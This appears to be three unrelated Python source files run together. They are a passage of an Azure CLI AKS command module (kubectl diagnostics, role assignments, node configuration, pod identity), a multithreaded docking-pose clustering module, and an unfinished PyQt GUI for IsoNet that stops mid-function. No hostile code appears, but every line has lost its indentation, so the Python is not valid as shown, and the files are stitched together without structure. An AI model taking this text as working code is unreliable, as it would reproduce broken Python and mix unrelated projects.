msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(
cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(
cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id,
resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning(
"Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster',
str(len(ready_nodes)))
if not ready_nodes:
logger.warning(
'No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
"apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Network config for node %s is %s',
node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s',
node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads(
'[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(
network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below is the network configuration for each node:")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
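# --aks-custom-headers is parsed as a comma-separated list of key=value pairs, for example
# "key1=value1,key2=value2" (placeholder names, for illustration only); malformed pairs raise a CLIError.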
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post-cluster-creation role assignment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
custom_headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
_add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster was created successfully, but we failed to attach '
'the ACR to it. You can manually grant permission to the identity '
'named <CLUSTER_NAME>-agentpool in the MC_ resource group to give '
'it permission to pull from the ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
custom_headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
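# _get_kubelet_config / _get_linux_os_config read JSON files describing custom node configuration
# (see https://aka.ms/CustomNodeConfig). A minimal illustrative kubelet config file, using only
# keys this code reads and made-up values, could look like:
#   {"cpuManagerPolicy": "static", "cpuCfsQuota": true, "failSwapOn": false}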
def _get_kubelet_config(file_path):
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError(
"Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get(
"cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get(
"cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get(
"imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get(
"imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get(
"topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get(
"allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
return config_object
def _get_linux_os_config(file_path):
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError(
"Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get(
"transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get(
"transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError(
"Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get(
"netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get(
"netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get(
"netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get(
"netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get(
"netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get(
"netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get(
"netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get(
"netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get(
"netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get(
"netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get(
"netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get(
"netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get(
"netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get(
"netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get(
"netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get(
"netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get(
"netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get(
"netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get(
"netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get(
"netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get(
"fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get(
"kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get(
"vmVfsCachePressure", None)
return config_object
def _is_pod_identity_addon_enabled(instance):
if not instance:
return False
if not instance.pod_identity_profile:
return False
return bool(instance.pod_identity_profile.enabled)
def _ensure_pod_identity_addon_is_enabled(instance):
if not _is_pod_identity_addon_enabled(instance):
raise CLIError('The pod identity addon is not enabled for this managed cluster yet.\n'
'To enable, run "az aks update --enable-pod-identity')
def _ensure_pod_identity_kubenet_consent(network_profile, pod_identity_profile, customer_consent):
if not network_profile or not network_profile.network_plugin:
# invalid data
return
if network_profile.network_plugin.lower() != 'kubenet':
# not kubenet, no need to check
return
if customer_consent is None:
        # not set this time, read from the previous value
customer_consent = bool(
pod_identity_profile.allow_network_plugin_kubenet)
if not customer_consent:
raise CLIError(
'--enable-pod-identity-with-kubenet is required for enabling pod identity addon when using Kubenet network plugin')
pod_identity_profile.allow_network_plugin_kubenet = True
def _update_addon_pod_identity(instance, enable, pod_identities=None, pod_identity_exceptions=None, allow_kubenet_consent=None):
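    # Rewrite the managed cluster's pod identity profile: disabling clears the profile,
    # while enabling merges the given identities/exceptions and enforces kubenet consent.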
if not enable:
# when disable, remove previous saved value
instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
enabled=False)
return
if not instance.pod_identity_profile:
# not set before
instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
enabled=enable,
user_assigned_identities=pod_identities,
user_assigned_identity_exceptions=pod_identity_exceptions,
)
_ensure_pod_identity_kubenet_consent(
instance.network_profile, instance.pod_identity_profile, allow_kubenet_consent)
instance.pod_identity_profile.enabled = enable
instance.pod_identity_profile.user_assigned_identities = pod_identities or []
instance.pod_identity_profile.user_assigned_identity_exceptions = pod_identity_exceptions or []
def _ensure_managed_identity_operator_permission(cli_ctx, instance, scope):
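    # Resolve the cluster's control-plane identity (user- or system-assigned) and make sure it
    # holds the Managed Identity Operator role on the given scope, creating the assignment if missing.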
cluster_identity_object_id = None
if instance.identity.type.lower() == 'userassigned':
for identity in instance.identity.user_assigned_identities.values():
cluster_identity_object_id = identity.principal_id
break
elif instance.identity.type.lower() == 'systemassigned':
cluster_identity_object_id = instance.identity.principal_id
else:
raise CLIError('unsupported identity type: {}'.format(
instance.identity.type))
if cluster_identity_object_id is None:
raise CLIError('unable to resolve cluster identity')
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError(
'Could not grant Managed Identity Operator permission for cluster')
    # need more time to propagate this assignment...
print()
print('Wait 30 seconds for identity role assignment propagation.')
time.sleep(30)
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
binding_selector=None,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(
cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(
cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
if binding_selector is not None:
pod_identity.binding_selector = binding_selector
pod_identities.append(pod_identity)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError(
'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
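    # Ensure the cluster control-plane identity holds the Managed Identity Operator role on the
    # given scope (the kubelet identity); skip if an equivalent assignment already exists.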
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError('Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
|
Clustered.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import bisect
from threading import Thread, Lock
from collections import OrderedDict
from .Tools import *
from .debug import Debug
from .debug import BColors
import json
# os and sys are used below; import them explicitly rather than relying on the
# wildcard import from Tools.
import os
import sys
if sys.version_info[0] == 3:
from queue import Queue, Empty
else:
from Queue import Queue, Empty
TAG = "Clustered.py: "
color = BColors.GREEN
class Clustered(object):
def __init__(self, cfg):
if cfg.opcion.startswith("BD") and cfg.clustered:
self.clt_path = cfg.OUTPUT_GRAPHS['clusters'][
'outPut'] + ".txt"
self.clt_json_path = cfg.OUTPUT_GRAPHS['clusters'][
'outPut'] + ".json"
self.cfg = cfg
self.debug = Debug(cfg.mode_debug)
self.queue = Queue()
self.mutex = Lock()
self.create_clustered()
@staticmethod
def add_to_cluster(q, mutex, pbar, poses):
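        # Worker: consume (cluster, pose) tasks; when a pose overlaps the cluster seed,
        # move it from the shared pose list into the cluster, keeping the cluster sorted.
        # A None task is the shutdown sentinel.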
while True:
try:
task = q.get(timeout=0.3)
except Empty:
continue
if task is None:
q.task_done()
break
else:
cluster, pose = task
if cluster[0].check_overlap(pose):
mutex.acquire()
poses.remove(pose)
bisect.insort(task[0], pose)
mutex.release()
q.task_done()
@staticmethod
def read_pose_file(q, mutex, pbar, poses):
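        # Worker: consume ligand poses from the queue and insert each one into the shared
        # 'poses' list in sorted order (bisect.insort). A None task is the shutdown sentinel.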
while True:
try:
lig_pose = q.get(timeout=0.3)
except Empty:
continue
if lig_pose is None:
q.task_done()
break
else:
mutex.acquire()
bisect.insort(poses, lig_pose)
mutex.release()
q.task_done()
#
    # Create a pml file with the protein data and the best ligands for PyMOL
#
def create_clustered(self):
pbar = custom_pbar()
try:
poses = []
threads = []
for i in range(self.cfg.cores):
thread = Thread(target=self.read_pose_file, args=(self.queue, self.mutex, pbar, poses))
thread.setDaemon(True)
thread.start()
threads.append(thread)
print(' Leyendo poses...')
pbar.start()
for lig in self.cfg.best_poses:
self.queue.put(lig)
self.queue.join()
pbar.finish()
print(' ')
except KeyboardInterrupt:
sys.stderr.write('\n\n\nCtrl+C: interrumpiendo\n\n\n')
self.queue.queue.clear()
for i in range(self.cfg.cores):
self.queue.put(None)
sys.exit()
else:
for i in range(self.cfg.cores):
self.queue.put(None)
for th in threads:
th.join()
clusters = self.make_clustered(poses)
self.cfg.best_poses = [cl[0] for cl in clusters.values()]
def clusterizar_poses(self, poses):
poses = list(poses)
clusters = []
pbar = custom_pbar()
try:
threads = []
for i in range(self.cfg.cores):
thread = Thread(target=self.add_to_cluster, args=(self.queue, self.mutex, pbar, poses))
thread.setDaemon(True)
thread.start()
threads.append(thread)
print(' Haciendo clusterizado...')
pbar.start()
while len(poses):
# The poses are ordered by energy, so the first pose in the list is the best one
# that does not yet belong to any cluster, so we use it as the center of a new one.
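                # For example (hypothetical scores): if the sorted list holds poses at
                # -9.1, -8.7 and -7.5 kcal/mol, the -9.1 pose seeds the new cluster and every
                # remaining pose is queued for an overlap check against that seed.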
new_cluster = [poses.pop(0)]
for pose in list(poses):
self.queue.put((new_cluster, pose))
self.queue.join()
clusters.append(new_cluster)
pbar.finish()
print(' ')
except KeyboardInterrupt:
sys.stderr.write('\n\n\nCtrl+C: interrumpiendo\n\n\n')
self.queue.queue.clear()
for i in range(self.cfg.cores):
self.queue.put(None)
sys.exit()
else:
for i in range(self.cfg.cores):
self.queue.put(None)
for th in threads:
th.join()
return clusters
def make_clustered(self, poses):
fclt = open(self.clt_path, "wt")
clusters = OrderedDict()
cls = {}
for i, cluster in enumerate(self.clusterizar_poses(poses)):
best_pose = cluster[0]
cl_name = "Site_{}_E{:.1f}".format(i + 1, best_pose.get_score())
clusters[cl_name] = cluster
fclt.write('Cluster #{} ( {:.1f} kcal/mol): {} poses; best pose: {}; site: ({:.2f}, {:.2f}, {:.2f})\n'
.format(i + 1, best_pose.get_score(), len(cluster), best_pose.num_execution, *best_pose.coords))
            c = {
                'cluster': i + 1,
                'score': best_pose.get_score(),
                'size': len(cluster),
                'best_pose': best_pose.num_execution,
                'coords': best_pose.coords,
                'option': self.cfg.opcion
            }
            cls['cl_' + str(i + 1)] = c
best_pose.copy_files(self.cfg.OUTPUT_DIRS['bestScore'])
fclt.close()
with open(self.clt_json_path, 'w') as json_file:
json.dump(cls, json_file)
self.fusion_graficas_en_cl(clusters)
return clusters
def fusion_graficas_en_cl(self, clusters):
clusters = [cl[0].get_score() for cl in clusters.values() for _ in cl]
title = "Clustered Docking Results ({} on {}):\n Binding Energy Frequency"\
.format(self.cfg.name_query, self.cfg.name_target)
fname = os.path.join(self.cfg.file_input, self.cfg.name_input + "_Clustered")
self.cfg.graphicsGenerator.generate_histogram_2(
clusters, self.cfg.plot_data, 'Clusters', 'Unclustered poses', title,
'Binding energy (kcal/mol)', 'Frequency', 'symlog', fname)
|
Isonet_app.py
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import QObject, pyqtSlot
from IsoNet.gui.mainwindow_v3 import Ui_MainWindow
import sys
import os
from IsoNet.gui.model import Model
import time
from threading import Thread
class MainWindowUIClass( Ui_MainWindow ):
def __init__( self ):
'''Initialize the super class
'''
super().__init__()
self.model = Model()
def setupUi( self, MW ):
''' Setup the UI of the super class, and add here code
that relates to the way we want our UI to operate.
'''
super().setupUi( MW )
self.logWindow.setFontPointSize(12)
self.model.processing = False
if self.model.isValid("log.txt"):
#qcolor = QtGui.QColor("red")
#self.logWindow.setTextColor(qcolor)
self.logWindow.setText( self.model.getFileContents("log.txt") )
# close the lower part of the splitter to hide the
# debug window under normal operations
#self.splitter.setSizes([300, 0])
isonet_path = os.popen("which isonet.py").read()
tmp = isonet_path.split("bin/isonet.py")
root_path = tmp[0]
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(root_path+"gui/icons/icon_folder.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.button_tomo_dir.setIcon(icon)
self.button_mask_dir.setIcon(icon)
self.button_pretrain_model.setIcon(icon)
self.button_output.setIcon(icon)
self.button_refined_model.setIcon(icon)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(root_path+"gui/icons/icon_advanced.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.button_advance_mask.setIcon(icon1)
self.button_advance_refine.setIcon(icon1)
self.button_advance_predict.setIcon(icon1)
def refreshAll( self ):
'''
Updates the widgets whenever an interaction happens.
Typically some interaction takes place, the UI responds,
and informs the model of the change. Then this method
is called, pulling from the model information that is
updated in the GUI.
'''
self.lineEdit_mask_dir.setText( self.model.getFolderName() )
        print(QtGui.QTextCursor.End)
self.logWindow.setText( self.model.getFileContents("log.txt") )
#self.lineEdit.setText( self.model.getFileName() )
#self.textEdit.setText( self.model.getFileContents() )
# slot
def browseSlot( self , btn ):
''' Called when the user presses the Browse button
'''
lineEdit = self.switch_btn(btn)
options = QtWidgets.QFileDialog.Options()
options |= QtWidgets.QFileDialog.DontUseNativeDialog
fileName, _ = QtWidgets.QFileDialog.getOpenFileName(
None,
"Choose File",
"",
"All Files (*)",
options=options)
if fileName:
#self.model.setFileName( fileName )
#######
#cmd = "echo choose file: {} >> log.txt ".format(fileName)
#os.system(cmd)
#self.logWindow.append("choose file: {}".format(fileName) )
lineEdit.setText( fileName )
#self.logWindow.moveCursor(QtGui.QTextCursor.End)
#######
#self.refreshAll()
#self.debugPrint( "Browse button pressed" )
def browseFolderSlot( self , btn):
''' Called when the user presses the Browse folder button
'''
lineEdit = self.switch_btn(btn)
try:
dir_path=QtWidgets.QFileDialog.getExistingDirectory(None,"Choose Directory",self.model.getPwd())
#self.model.setFolderName( dir_path )
#cmd = "echo choose folder: {} >> log.txt ".format(dir_path)
#os.system(cmd)
#self.logWindow.append("choose folder: {}".format(dir_path) )
lineEdit.setText( dir_path )
#self.logWindow.moveCursor(QtGui.QTextCursor.End)
#self.refreshAll()
        except Exception:
##TODO: record to log.
pass
def advancedMenu( self , btn ):
''' Called when the user presses the Browse button
'''
widget = self.switch_btn(btn)
if widget.isVisible():
widget.setVisible(False)
else:
widget.setVisible(True)
def switch_btn(self, btn):
switcher = {
"mask_dir": self.lineEdit_mask_dir,
"tomo_dir": self.lineEdit_tomo_dir,
"pretrain_model":self.lineEdit_pretrain_model,
"output": self.lineEdit_output,
"refined_model":self.lineEdit_refined_model,
"advance_mask":self.widget_mask,
"advance_refine":self.widget_refine,
"advance_predict":self.widget_predict
}
return switcher.get(btn, "Invaid btn name")
def printCmds( self ):
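        # Validate the GUI fields through the model's paraChecks* helpers and build the
        # isonet.py / deconvolve.py command lines for every checked step (mask, deconvolve,
        # refine, predict), echoing them to the log window. Returns the command list, or
        # None when validation fails.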
pwd = os.getcwd().replace("\\","/")
cmd2run = []
if self.checkBox_mask.isChecked():
tomo_dir = self.lineEdit_tomo_dir.text()
mask_dir = self.lineEdit_mask_dir.text()
percentile = self.lineEdit_percentile.text() if self.lineEdit_percentile.text() else 100
threshold = self.lineEdit_threshold.text() if self.lineEdit_threshold.text() else 0.5
error_msg = self.model.paraChecksMask(tomo_dir, mask_dir, percentile, threshold)
if error_msg != "":
error_msg = "########## Error! ##########\n" + error_msg
#cmd = "echo \"{}\" >> log.txt".format(error_msg)
#print(cmd)
#os.system(cmd)
self.logWindow.append(error_msg)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
return None
else:
tomo_dir = self.model.sim_path(pwd, tomo_dir)
